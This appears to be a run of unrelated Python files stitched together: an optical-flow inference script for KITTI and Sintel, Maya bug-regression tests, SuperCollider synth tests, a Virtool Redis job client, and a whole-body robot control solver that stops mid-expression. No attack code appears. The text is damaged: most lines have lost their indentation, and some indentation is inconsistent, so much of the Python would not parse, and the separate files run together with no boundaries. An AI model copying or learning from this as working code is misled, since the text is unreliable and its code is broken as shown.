parser.add_argument('--datapath', default='/ssd/kitti_scene/training/',
help='dataset path')
parser.add_argument('--loadmodel', default=None,
help='model path')
parser.add_argument('--outdir', default='output',
help='output dir')
parser.add_argument('--testres', type=float, default=1,
help='resolution')
parser.add_argument('--maxdisp', type=int ,default=256,
help='maxium disparity. Only affect the coarsest cost volume size')
parser.add_argument('--fac', type=float ,default=1,
help='controls the shape of search grid. Only affect the coarse cost volume size')
args = parser.parse_args()
# dataloader
if args.dataset == '2015':
from dataloader import kitti15list as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == '2015val':
from dataloader import kitti15list_val as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == '2015vallidar':
from dataloader import kitti15list_val_lidar as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == '2015test':
from dataloader import kitti15list as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == 'seq':
from dataloader import seqlist as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == 'sinteltest':
from dataloader import sintellist as DA
maxw,maxh = [int(args.testres*1024), int(args.testres*448)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == 'sintel':
from dataloader import sintellist_val as DA
maxw,maxh = [int(args.testres*1024), int(args.testres*448)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
max_h = int(maxh // 64 * 64)
max_w = int(maxw // 64 * 64)
if max_h < maxh: max_h += 64
if max_w < maxw: max_w += 64
maxh = max_h
maxw = max_w
mean_L = [[0.33,0.33,0.33]]
mean_R = [[0.33,0.33,0.33]]
# construct model, VCN-expansion
from models.VCN_exp import VCN
model = VCN([1, maxw, maxh], md=[int(4*(args.maxdisp/256)),4,4,4,4], fac=args.fac,
            exp_unc=(args.loadmodel is not None and 'robust' in args.loadmodel)) # expansion uncertainty only in the new model
model = nn.DataParallel(model, device_ids=[0])
model.cuda()
if args.loadmodel is not None:
pretrained_dict = torch.load(args.loadmodel)
mean_L=pretrained_dict['mean_L']
mean_R=pretrained_dict['mean_R']
pretrained_dict['state_dict'] = {k:v for k,v in pretrained_dict['state_dict'].items()}
model.load_state_dict(pretrained_dict['state_dict'],strict=False)
else:
print('dry run')
print('Number of model parameters: {}'.format(sum([p.data.nelement() for p in model.parameters()])))
mkdir_p('%s/%s/'% (args.outdir, args.dataset))
def main():
model.eval()
ttime_all = []
for inx in range(len(test_left_img)):
print(test_left_img[inx])
imgL_o = cv2.imread(test_left_img[inx])[:,:,::-1]
imgR_o = cv2.imread(test_right_img[inx])[:,:,::-1]
# for gray input images
if len(imgL_o.shape) == 2:
imgL_o = np.tile(imgL_o[:,:,np.newaxis],(1,1,3))
imgR_o = np.tile(imgR_o[:,:,np.newaxis],(1,1,3))
# resize
maxh = imgL_o.shape[0]*args.testres
maxw = imgL_o.shape[1]*args.testres
max_h = int(maxh // 64 * 64)
max_w = int(maxw // 64 * 64)
if max_h < maxh: max_h += 64
if max_w < maxw: max_w += 64
input_size = imgL_o.shape
imgL = cv2.resize(imgL_o,(max_w, max_h))
imgR = cv2.resize(imgR_o,(max_w, max_h))
# flip channel, subtract mean
imgL = imgL[:,:,::-1].copy() / 255. - np.asarray(mean_L).mean(0)[np.newaxis,np.newaxis,:]
imgR = imgR[:,:,::-1].copy() / 255. - np.asarray(mean_R).mean(0)[np.newaxis,np.newaxis,:]
imgL = np.transpose(imgL, [2,0,1])[np.newaxis]
imgR = np.transpose(imgR, [2,0,1])[np.newaxis]
# modify module according to inputs
from models.VCN_exp import WarpModule, flow_reg
for i in range(len(model.module.reg_modules)):
model.module.reg_modules[i] = flow_reg([1,max_w//(2**(6-i)), max_h//(2**(6-i))],
ent=getattr(model.module, 'flow_reg%d'%2**(6-i)).ent,\
maxdisp=getattr(model.module, 'flow_reg%d'%2**(6-i)).md,\
fac=getattr(model.module, 'flow_reg%d'%2**(6-i)).fac).cuda()
for i in range(len(model.module.warp_modules)):
model.module.warp_modules[i] = WarpModule([1,max_w//(2**(6-i)), max_h//(2**(6-i))]).cuda()
# forward
imgL = Variable(torch.FloatTensor(imgL).cuda())
imgR = Variable(torch.FloatTensor(imgR).cuda())
with torch.no_grad():
imgLR = torch.cat([imgL,imgR],0)
model.eval()
torch.cuda.synchronize()
start_time = time.time()
rts = model(imgLR)
torch.cuda.synchronize()
ttime = (time.time() - start_time); print('time = %.2f' % (ttime*1000) )
ttime_all.append(ttime)
flow, occ, logmid, logexp = rts
# upsampling
occ = cv2.resize(occ.data.cpu().numpy(), (input_size[1],input_size[0]),interpolation=cv2.INTER_LINEAR)
logexp = cv2.resize(logexp.cpu().numpy(), (input_size[1],input_size[0]),interpolation=cv2.INTER_LINEAR)
logmid = cv2.resize(logmid.cpu().numpy(), (input_size[1],input_size[0]),interpolation=cv2.INTER_LINEAR)
flow = torch.squeeze(flow).data.cpu().numpy()
flow = np.concatenate( [cv2.resize(flow[0],(input_size[1],input_size[0]))[:,:,np.newaxis],
cv2.resize(flow[1],(input_size[1],input_size[0]))[:,:,np.newaxis]],-1)
flow[:,:,0] *= imgL_o.shape[1] / max_w
flow[:,:,1] *= imgL_o.shape[0] / max_h
flow = np.concatenate( (flow, np.ones([flow.shape[0],flow.shape[1],1])),-1)
# save predictions
idxname = test_left_img[inx].split('/')[-1]
with open('%s/%s/flo-%s.pfm'% (args.outdir, args.dataset,idxname.split('.')[0]),'w') as f:
save_pfm(f,flow[::-1].astype(np.float32))
flowvis = point_vec(imgL_o, flow)
cv2.imwrite('%s/%s/visflo-%s.jpg'% (args.outdir, args.dataset,idxname),flowvis)
imwarped = warp_flow(imgR_o, flow[:,:,:2])
cv2.imwrite('%s/%s/warp-%s.jpg'% (args.outdir, args.dataset,idxname),imwarped[:,:,::-1])
with open('%s/%s/occ-%s.pfm'% (args.outdir, args.dataset,idxname.split('.')[0]),'w') as f:
save_pfm(f,occ[::-1].astype(np.float32))
with open('%s/%s/exp-%s.pfm'% (args.outdir, args.dataset,idxname.split('.')[0]),'w') as f:
save_pfm(f,logexp[::-1].astype(np.float32))
with open('%s/%s/mid-%s.pfm'% (args.outdir, args.dataset,idxname.split('.')[0]),'w') as f:
save_pfm(f,logmid[::-1].astype(np.float32))
torch.cuda.empty_cache()
print(np.mean(ttime_all))
if __name__ == '__main__':
main()
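# Example invocation (an editorial addition; the script name, data path, and
# checkpoint file are placeholders). Note that exp_unc is enabled only when the
# checkpoint filename contains 'robust', per the model construction above:
#   python <this_script>.py --dataset 2015 --datapath /path/to/kitti_scene/training/ \
#       --loadmodel /path/to/checkpoint_robust.pth --outdir output --testres 1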
|
105799
|
import sys
import os
import unittest
import maya.cmds as cmds
import maya.OpenMaya as om
import maya.OpenMayaAnim as oma
import maya.OpenMayaFX as omfx
import pymel.versions
from pymel.util.testing import TestCaseExtended
if not hasattr(cmds, 'about'):
import maya.standalone
maya.standalone.initialize()
#===============================================================================
# Current Bugs
#===============================================================================
# For CURRENT bugs, we PASS if the bug is still present, and FAIL if it goes
# away... this may be counter-intuitive, but it acts as an alert if a bug is
# fixed (so we can possibly get rid of yucky work-around code...)
# Bug report 378211
class TestConstraintAngleOffsetQuery(TestCaseExtended):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
for cmdName in ('aimConstraint', 'orientConstraint'):
cube1 = cmds.polyCube()[0]
cube2 = cmds.polyCube()[0]
cmd = getattr(cmds, cmdName)
constraint = cmd(cube1, cube2)[0]
setVals = (12, 8, 7)
cmd(constraint, e=1, offset=setVals)
getVals = tuple(cmd(constraint, q=1, offset=1))
# self.assertVectorsEqual(setVals, getVals)
# check that things are BAD!
try:
self.assertVectorsEqual(setVals, getVals)
except AssertionError:
pass
else:
self.fail("TestConstraintAngleOffsetQuery was fixed! Huzzah!")
# Bug report 378192
class TestEmptyMFnNurbsCurve(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
shapeStr = cmds.createNode('nurbsCurve', n="RigWorldShape")
selList = om.MSelectionList()
selList.add(shapeStr)
node = om.MObject()
selList.getDependNode(0, node)
mnc = om.MFnNurbsCurve()
self.assertTrue(mnc.hasObj(node))
# try:
# mnc.setObject(node)
# except Exception:
# self.fail("MFnNurbs curve doesn't work with empty curve object")
# check that things are BAD!
try:
mnc.setObject(node)
except Exception:
pass
else:
self.fail("MFnNurbs curve now works with empty curve objects! Yay!")
# Bug report 344037
class TestSurfaceRangeDomain(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
try:
# create a nurbs sphere
mySphere = cmds.sphere()[0]
# a default sphere should have u/v
# parameter ranges of 0:4/0:8
# The following selections should
# result in one of these:
desiredResults = ('nurbsSphere1.u[2:3][0:8]',
'nurbsSphere1.u[2:3][*]',
'nurbsSphere1.u[2:3]',
'nurbsSphere1.uv[2:3][0:8]',
'nurbsSphere1.uv[2:3][*]',
'nurbsSphere1.uv[2:3]',
'nurbsSphere1.v[0:8][2:3]',
'nurbsSphere1.v[*][2:3]')
# Passes
cmds.select('nurbsSphere1.u[2:3][*]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Passes
cmds.select('nurbsSphere1.v[*][2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Fails! - returns 'nurbsSphere1.u[2:3][0:1]'
cmds.select('nurbsSphere1.u[2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Fails! - returns 'nurbsSphere1.u[2:3][0:1]'
cmds.select('nurbsSphere1.uv[2:3][*]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# The following selections should
# result in one of these:
desiredResults = ('nurbsSphere1.u[0:4][2:3]',
'nurbsSphere1.u[*][2:3]',
'nurbsSphere1.uv[0:4][2:3]',
'nurbsSphere1.uv[*][2:3]',
'nurbsSphere1.v[2:3][0:4]',
'nurbsSphere1.v[2:3][*]',
'nurbsSphere1.v[2:3]')
# Passes
cmds.select('nurbsSphere1.u[*][2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Passes
cmds.select('nurbsSphere1.v[2:3][*]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Fails! - returns 'nurbsSphereShape1.u[0:1][2:3]'
cmds.select('nurbsSphere1.v[2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Fails! - returns 'nurbsSphereShape1.u[0:4][0:1]'
cmds.select('nurbsSphere1.uv[*][2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
except AssertionError:
pass
else:
# check that things are BAD!
self.fail("Nurbs surface range domain bug fixed!")
# Bug report 345384
# This bug only seems to affect windows (or at least, Win x64 -
# haven't tried on 32-bit).
class TestMMatrixSetAttr(unittest.TestCase):
def setUp(self):
# pymel essentially fixes this bug by wrapping
# the api's __setattr__... so undo this before testing
if 'pymel.internal.factories' in sys.modules:
factories = sys.modules['pymel.internal.factories']
self.origSetAttr = factories.MetaMayaTypeWrapper._originalApiSetAttrs.get(om.MMatrix, None)
else:
self.origSetAttr = None
if self.origSetAttr:
self.fixedSetAttr = om.MMatrix.__setattr__
om.MMatrix.__setattr__ = self.origSetAttr
cmds.file(new=1, f=1)
def runTest(self):
# We expect it to fail on windows, and pass on other operating systems...
shouldPass = os.name != 'nt'
try:
class MyClass1(object):
def __init__(self):
self._bar = 'not set'
def _setBar(self, val):
print "setting bar to:", val
self._bar = val
def _getBar(self):
print "getting bar..."
return self._bar
bar = property(_getBar, _setBar)
# These two are just so we can trace what's going on...
def __getattribute__(self, name):
# don't just use 'normal' repr, as that will
# call __getattribute__!
print "__getattribute__(%s, %r)" % (object.__repr__(self), name)
return super(MyClass1, self).__getattribute__(name)
def __setattr__(self, name, val):
print "__setattr__(%r, %r, %r)" % (self, name, val)
return super(MyClass1, self).__setattr__(name, val)
foo1 = MyClass1()
# works like we expect...
foo1.bar = 7
print "foo1.bar:", foo1.bar
self.assertTrue(foo1.bar == 7)
class MyClass2(MyClass1, om.MMatrix): pass
foo2 = MyClass2()
foo2.bar = 7
# Here, on windows, MMatrix's __setattr__ takes over, and
# (after presumabably determining it didn't need to do
# whatever special case thing it was designed to do)
# instead of calling the super's __setattr__, which would
# use the property, inserts it into the object's __dict__
# manually
print "foo2.bar:", foo2.bar
self.assertTrue(foo2.bar == 7)
except Exception:
if shouldPass:
raise
else:
if not shouldPass:
self.fail("MMatrix setattr bug seems to have been fixed!")
def tearDown(self):
# Restore the 'fixed' __setattr__'s
if self.origSetAttr:
om.MMatrix.__setattr__ = self.fixedSetAttr
# Introduced in maya 2014
# Change request #: BSPR-12597
if pymel.versions.current() >= pymel.versions.v2014:
class TestShapeParentInstance(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
try:
import maya.cmds as cmds
def getShape(trans):
return cmds.listRelatives(trans, children=True, shapes=True)[0]
cmds.file(new=1, f=1)
shapeTransform = cmds.polyCube(name='singleShapePoly')[0]
origShape = getShape(shapeTransform)
dupeTransform1 = cmds.duplicate(origShape, parentOnly=1)[0]
cmds.parent(origShape, dupeTransform1, shape=True, addObject=True, relative=True)
dupeTransform2 = cmds.duplicate(dupeTransform1)[0]
cmds.delete(dupeTransform1)
dupeShape = getShape(dupeTransform2)
# In maya 2014, this raises:
# Error: Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Source is not connected.
# Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Destination attribute must be writable.
# Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Destination attribute must be writable.
# Traceback (most recent call last):
# File "<maya console>", line 13, in <module>
# RuntimeError: Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Source is not connected.
# Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Destination attribute must be writable.
# Connection not made: 'singleShapePolyShape2.instObjGroups[1]' -> 'initialShadingGroup.dagSetMembers[2]'. Destination attribute must be writable. #
cmds.parent(dupeShape, shapeTransform, shape=True, addObject=True, relative=True)
except Exception:
pass
else:
self.fail("ShapeParentInstance bug fixed!")
#===============================================================================
# Current bugs that will cause Maya to CRASH (and so are commented out!)
#===============================================================================
# This is commented out as it will cause a CRASH - uncomment out (or just
# copy/ paste the relevant code into the script editor) to test if it's still
# causing a crash...
# If you're copy / pasting into a script editor, in order for a crash to occur,
# all lines must be executed at once - if you execute one at a time, there will
# be no crash
# Also, I'm making the code in each of the test functions self-contained (ie,
# has all imports, etc) for easy copy-paste testing...
#class TestSubdivSelectCrash(unittest.TestCase):
# def testCmds(self):
# import maya.cmds as cmds
# cmds.file(new=1, f=1)
# polyCube = cmds.polyCube()[0]
# subd = cmds.polyToSubdiv(polyCube)[0]
# cmds.select(subd + '.sme[*][*]')
#
# def testApi(self):
# import maya.cmds as cmds
# import maya.OpenMaya as om
#
# polyCube = cmds.polyCube()[0]
# subd = cmds.polyToSubdiv(polyCube)[0]
# selList = om.MSelectionList()
# selList.add(subd + '.sme[*][*]')
#===============================================================================
# FIXED (Former) Bugs
#===============================================================================
# Fixed in Maya 2009! yay!
class TestConstraintVectorQuery(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def _doTestForConstraintType(self, constraintType):
cmd = getattr(cmds, constraintType)
if constraintType == 'tangentConstraint':
target = cmds.circle()[0]
else:
target = cmds.polyCube()[0]
constrained = cmds.polyCube()[0]
constr = cmd(target, constrained)[0]
self.assertEqual(cmd(constr, q=1, worldUpVector=1), [0,1,0])
self.assertEqual(cmd(constr, q=1, upVector=1), [0,1,0])
self.assertEqual(cmd(constr, q=1, aimVector=1), [1,0,0])
def test_aimConstraint(self):
self._doTestForConstraintType('aimConstraint')
def test_normalConstraint(self):
self._doTestForConstraintType('normalConstraint')
def test_tangentConstraint(self):
self._doTestForConstraintType('tangentConstraint')
# Fixed ! Yay! (...though I've only checked on win64...)
# (not sure when... was fixed by time of 2011 Hotfix 1 - api 201101,
# and still broken in 2009 SP1a - api 200906)
class TestMatrixSetAttr(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
res = cmds.sphere(n='node')
cmds.addAttr(ln='matrixAttr',dt="matrix")
def runTest(self):
cmds.setAttr( 'node.matrixAttr', 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, type='matrix' )
# Bug report 345382
# Fixed ! Yay! (...though I've only checked on win64...)
# (not sure when... was fixed by time of 2011 Hotfix 1 - api 201101,
# and still broken in 2009 SP1a - api 200906)
class TestFluidMFnCreation(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
fluid = cmds.createNode('fluidShape')
selList = om.MSelectionList()
selList.add(fluid)
dag = om.MDagPath()
selList.getDagPath(0, dag)
omfx.MFnFluid(dag)
# nucleus node fixed in 2014
# symmetryConstraint fixed in 2015
class TestMFnCompatibility(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
    def _assertInheritMFnConsistency(self, nodeType, parentNodeType, mfnType):
nodeInstName = cmds.createNode(nodeType)
selList = om.MSelectionList()
selList.add(nodeInstName)
mobj = om.MObject()
selList.getDependNode(0, mobj)
self.assertTrue(parentNodeType in cmds.nodeType(nodeInstName, inherited=True))
try:
mfnType(mobj)
except Exception, e:
            self.fail("Error creating %s even though %s inherits from %s: %s" %
(mfnType.__name__, nodeType, parentNodeType, e))
def test_nucleus_MFnDagNode(self):
        self._assertInheritMFnConsistency('nucleus', 'dagNode', om.MFnDagNode)
def test_nucleus_MFnTransform(self):
        self._assertInheritMFnConsistency('nucleus', 'transform', om.MFnTransform)
    def test_symmetryConstraint_MFnDagNode(self):
        self._assertInheritMFnConsistency('symmetryConstraint', 'dagNode', om.MFnDagNode)
def test_symmetryConstraint_MFnTransform(self):
        self._assertInheritMFnConsistency('symmetryConstraint', 'transform',
om.MFnTransform)
# These probably aren't strictly considered "bugs" by autodesk, though I
# think they should be...
# def test_hikHandle_MFnIkHandle(self):
# self._assertInheritMFnConistency('hikHandle', 'ikHandle', oma.MFnIkHandle)
#
# def test_jointFfd_MFnLatticeDeformer(self):
# self._assertInheritMFnConistency('jointFfd', 'ffd', oma.MFnLatticeDeformer)
#
# def test_transferAttributes_MFnWeightGeometryFilter(self):
# self._assertInheritMFnConistency('transferAttributes', 'weightGeometryFilter', oma.MFnWeightGeometryFilter)
#
# def test_transferAttributes_MFnGeometryFilter(self):
# self._assertInheritMFnConistency('transferAttributes', 'geometryFilter', oma.MFnGeometryFilter)
# Fixed in 2014! yay!
class TestGroupUniqueness(unittest.TestCase):
'''Test to check whether cmds.group returns a unique name
'''
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
cmds.select(cl=1)
cmds.group(n='foo', empty=1)
cmds.group(n='bar')
cmds.select(cl=1)
res = cmds.group(n='foo', empty=1)
sameNames = cmds.ls(res)
if len(sameNames) < 1:
self.fail('cmds.group did not return a valid name')
elif len(sameNames) > 1:
self.fail('cmds.group did not return a unique name')
|
105802
|
import pytest
import supercollider
from tests.shared import server
def test_synth_create(server):
synth = supercollider.Synth(server, "sine", { "freq": 440.0, "gain": -24 })
assert synth.id > 0
synth.free()
def test_synth_get_set(server):
synth = supercollider.Synth(server, "sine", { "freq": 440.0, "gain": -24 })
assert synth.get("freq") == 440.0
synth.set("freq", 880.0)
assert synth.get("freq") == 880.0
synth.free()
def test_synth_actions(server):
group = supercollider.Group(server)
synth0 = supercollider.Synth(server, "sine", { "gain": -96 }, target=group)
tree = server.query_tree(group)
assert tree[2] == 1
assert tree[3] == synth0.id
synth1 = supercollider.Synth(server, "sine", { "gain": -96 }, target=group, action=supercollider.ADD_TO_HEAD)
tree = server.query_tree(group)
assert tree[2] == 2
assert tree[3] == synth1.id
synth2 = supercollider.Synth(server, "sine", { "gain": -96 }, target=group, action=supercollider.ADD_TO_TAIL)
tree = server.query_tree(group)
print(tree)
assert tree[2] == 3
assert tree[3] == synth1.id
assert tree[9] == synth2.id
synth3 = supercollider.Synth(server, "sine", { "gain": -96 }, target=synth1, action=supercollider.ADD_AFTER)
tree = server.query_tree(group)
print(tree)
assert tree[2] == 4
assert tree[3] == synth3.id
synth4 = supercollider.Synth(server, "sine", { "gain": -96 }, target=synth1, action=supercollider.ADD_BEFORE)
tree = server.query_tree(group)
print(tree)
assert tree[2] == 5
assert tree[9] == synth4.id
group.free()
|
105826
|
import logging
from asyncio import gather
from virtool.db.utils import get_one_field
from virtool.jobs.db import PROJECTION, cancel
logger = logging.getLogger(__name__)
WORKFLOW_NAMES = (
"jobs_build_index",
"jobs_create_sample",
"jobs_create_subtraction",
"jobs_aodp",
"jobs_nuvs",
"jobs_pathoscope_bowtie",
)
class JobsClient:
def __init__(self, app):
self.db = app["db"]
self.redis = app["redis"]
async def enqueue(self, job_id):
workflow = await get_one_field(self.db.jobs, "workflow", job_id)
await self.redis.rpush(f"jobs_{workflow}", job_id)
logger.debug(f"Enqueued job: {job_id}")
async def cancel(self, job_id: str) -> dict:
"""
Cancel the job with the given `job_id`.
        If the job is still waiting, its ID will be in a Redis list. Remove the ID from the list and append a
        cancelled status record to the job document's status field.
If the job is running, set its state to `cancelling` and publish its ID to the cancellation Redis PubSub
channel. Listening runners will see the ID and cancel their jobs if their current job ID matches.
:param job_id: the ID of the job to cancel
:return: the updated job document
"""
lrem_calls = [
self.redis.lrem(workflow_name, 0, job_id)
for workflow_name in WORKFLOW_NAMES
]
counts = await gather(*lrem_calls)
if any(counts):
logger.debug(f"Removed job from Redis job queue: {job_id}")
return await cancel(self.db, job_id)
document = await self.db.jobs.find_one_and_update(
{"_id": job_id}, {"$set": {"state": "cancelling"}}, projection=PROJECTION
)
await self.redis.publish("channel:cancel", job_id)
logger.debug(f"Requested job cancellation via Redis: {job_id}")
return document
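# --- Illustrative usage sketch (an editorial addition, not part of the module).
# `app` is assumed to be an application mapping that already holds "db" and
# "redis" clients, as the constructor above expects.
async def _example_jobs_client(app, job_id: str) -> dict:
    client = JobsClient(app)
    await client.enqueue(job_id)            # push the job ID onto its workflow queue
    document = await client.cancel(job_id)  # remove it again, or request cancellation
    return document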
|
105872
|
import sys
import numpy as np
np.set_printoptions(precision=2, threshold=sys.maxsize)
from scipy.linalg import block_diag
from qpsolvers import solve_qp
from util import util
from pnc.data_saver import DataSaver
class IHWBC(object):
"""
Implicit Hierarchy Whole Body Control
------------------
Usage:
update_setting --> solve
"""
def __init__(self, sf, sa, sv, data_save=False):
self._n_q_dot = sa.shape[1]
self._n_active = sa.shape[0]
self._n_passive = sv.shape[0]
self._sf = sf
self._snf = np.concatenate(
(np.zeros((self._n_active + self._n_passive, 6)),
np.eye(self._n_active + self._n_passive)),
axis=1)
self._sa = sa
self._sv = sv
self._trq_limit = None
self._lambda_q_ddot = 0.
self._lambda_rf = 0.
self._w_rf = 0.
self._w_hierarchy = 0.
self._b_data_save = data_save
if self._b_data_save:
self._data_saver = DataSaver()
@property
def trq_limit(self):
return self._trq_limit
@property
def lambda_q_ddot(self):
return self._lambda_q_ddot
@property
def lambda_rf(self):
return self._lambda_rf
@property
def w_hierarchy(self):
return self._w_hierarchy
@property
def w_rf(self):
return self._w_rf
@trq_limit.setter
def trq_limit(self, val):
assert val.shape[0] == self._n_active
self._trq_limit = np.copy(val)
@lambda_q_ddot.setter
def lambda_q_ddot(self, val):
self._lambda_q_ddot = val
@lambda_rf.setter
def lambda_rf(self, val):
self._lambda_rf = val
@w_hierarchy.setter
def w_hierarchy(self, val):
self._w_hierarchy = val
    @w_rf.setter
def w_rf(self, val):
self._w_rf = val
def update_setting(self, mass_matrix, mass_matrix_inv, coriolis, gravity):
self._mass_matrix = np.copy(mass_matrix)
self._mass_matrix_inv = np.copy(mass_matrix_inv)
self._coriolis = np.copy(coriolis)
self._gravity = np.copy(gravity)
def solve(self,
task_list,
contact_list,
internal_constraint_list,
rf_des=None,
verbose=False):
"""
Parameters
----------
task_list (list of Task):
Task list
contact_list (list of Contact):
Contact list
internal_constraint_list (list of InternalConstraint):
Internal constraint list
rf_des (np.ndarray):
Reaction force desired
verbose (bool):
Printing option
Returns
-------
joint_trq_cmd (np.array):
Joint trq cmd
joint_acc_cmd (np.array):
Joint acc cmd
sol_rf (np.array):
Reaction force
"""
# ======================================================================
# Internal Constraint
# Set ni, jit_lmd_jidot_qdot, sa_ni_trc_bar_tr, and b_internal_constraint
# ======================================================================
if len(internal_constraint_list) > 0:
ji = np.concatenate(
[ic.jacobian for ic in internal_constraint_list], axis=0)
jidot_qdot = np.concatenate(
[ic.jacobian_dot_q_dot for ic in internal_constraint_list],
axis=0)
lmd = np.linalg.pinv(
np.dot(np.dot(ji, self._mass_matrix_inv), ji.transpose()))
ji_bar = np.dot(np.dot(self._mass_matrix_inv, ji.transpose()), lmd)
ni = np.eye(self._n_q_dot) - np.dot(ji_bar, ji)
jit_lmd_jidot_qdot = np.squeeze(
np.dot(np.dot(ji.transpose(), lmd), jidot_qdot))
sa_ni_trc = np.dot(self._sa, ni)[:, 6:]
sa_ni_trc_bar = util.weighted_pinv(sa_ni_trc,
self._mass_matrix_inv[6:, 6:])
sa_ni_trc_bar_tr = sa_ni_trc_bar.transpose()
b_internal_constraint = True
else:
ni = np.eye(self._n_q_dot)
jit_lmd_jidot_qdot = np.zeros(self._n_q_dot)
sa_ni_trc_bar = np.eye(self._n_active)
sa_ni_trc_bar_tr = sa_ni_trc_bar.transpose()
b_internal_constraint = False
# print("ni")
# print(ni)
# print("jit_lmd_jidot_qdot")
# print(jit_lmd_jidot_qdot)
# print("sa_ni_trc_bar_tr")
# print(sa_ni_trc_bar_tr)
# exit()
# ======================================================================
# Cost
# ======================================================================
cost_t_mat = np.zeros((self._n_q_dot, self._n_q_dot))
cost_t_vec = np.zeros(self._n_q_dot)
for i, task in enumerate(task_list):
j = task.jacobian
j_dot_q_dot = task.jacobian_dot_q_dot
x_ddot = task.op_cmd
if verbose:
print("====================")
print(task.target_id, " task")
task.debug()
cost_t_mat += self._w_hierarchy[i] * np.dot(j.transpose(), j)
cost_t_vec += self._w_hierarchy[i] * np.dot(
(j_dot_q_dot - x_ddot).transpose(), j)
# cost_t_mat += self._lambda_q_ddot * np.eye(self._n_q_dot)
cost_t_mat += self._lambda_q_ddot * self._mass_matrix
if contact_list is not None:
uf_mat = np.array(
block_diag(
*[contact.cone_constraint_mat
for contact in contact_list]))
uf_vec = np.concatenate(
[contact.cone_constraint_vec for contact in contact_list])
contact_jacobian = np.concatenate(
[contact.jacobian for contact in contact_list], axis=0)
assert uf_mat.shape[0] == uf_vec.shape[0]
assert uf_mat.shape[1] == contact_jacobian.shape[0]
dim_cone_constraint, dim_contacts = uf_mat.shape
cost_rf_mat = (self._lambda_rf + self._w_rf) * np.eye(dim_contacts)
if rf_des is None:
rf_des = np.zeros(dim_contacts)
cost_rf_vec = -self._w_rf * np.copy(rf_des)
cost_mat = np.array(block_diag(
cost_t_mat, cost_rf_mat)) # (nqdot+nc, nqdot+nc)
cost_vec = np.concatenate([cost_t_vec, cost_rf_vec]) # (nqdot+nc,)
else:
dim_contacts = dim_cone_constraint = 0
cost_mat = np.copy(cost_t_mat)
cost_vec = np.copy(cost_t_vec)
# if verbose:
# print("==================================")
# np.set_printoptions(precision=4)
# print("cost_t_mat")
# print(cost_t_mat)
# print("cost_t_vec")
# print(cost_t_vec)
# print("cost_rf_mat")
# print(cost_rf_mat)
# print("cost_rf_vec")
# print(cost_rf_vec)
# print("cost_mat")
# print(cost_mat)
# print("cost_vec")
# print(cost_vec)
# ======================================================================
# Equality Constraint
# ======================================================================
if contact_list is not None:
eq_floating_mat = np.concatenate(
(np.dot(self._sf, self._mass_matrix),
-np.dot(self._sf,
np.dot(contact_jacobian, ni).transpose())),
axis=1) # (6, nqdot+nc)
if b_internal_constraint:
eq_int_mat = np.concatenate(
(ji, np.zeros((ji.shape[0], dim_contacts))),
axis=1) # (2, nqdot+nc)
eq_int_vec = np.zeros(ji.shape[0])
else:
eq_floating_mat = np.dot(self._sf, self._mass_matrix)
if b_internal_constraint:
eq_int_mat = np.copy(ji)
eq_int_vec = np.zeros(ji.shape[0])
eq_floating_vec = -np.dot(self._sf,
np.dot(ni.transpose(),
(self._coriolis + self._gravity)))
if b_internal_constraint:
eq_mat = np.concatenate((eq_floating_mat, eq_int_mat), axis=0)
eq_vec = np.concatenate((eq_floating_vec, eq_int_vec), axis=0)
else:
eq_mat = np.copy(eq_floating_mat)
eq_vec = np.copy(eq_floating_vec)
# ======================================================================
# Inequality Constraint
# ======================================================================
if self._trq_limit is None:
if contact_list is not None:
ineq_mat = np.concatenate(
(np.zeros((dim_cone_constraint, self._n_q_dot)), -uf_mat),
axis=1)
ineq_vec = -uf_vec
else:
ineq_mat = None
ineq_vec = None
else:
if contact_list is not None:
ineq_mat = np.concatenate(
(np.concatenate(
(np.zeros((dim_cone_constraint, self._n_q_dot)),
-np.dot(sa_ni_trc_bar_tr,
np.dot(self._snf, self._mass_matrix)),
np.dot(sa_ni_trc_bar_tr,
np.dot(self._snf, self._mass_matrix))),
axis=0),
np.concatenate(
(-uf_mat,
np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
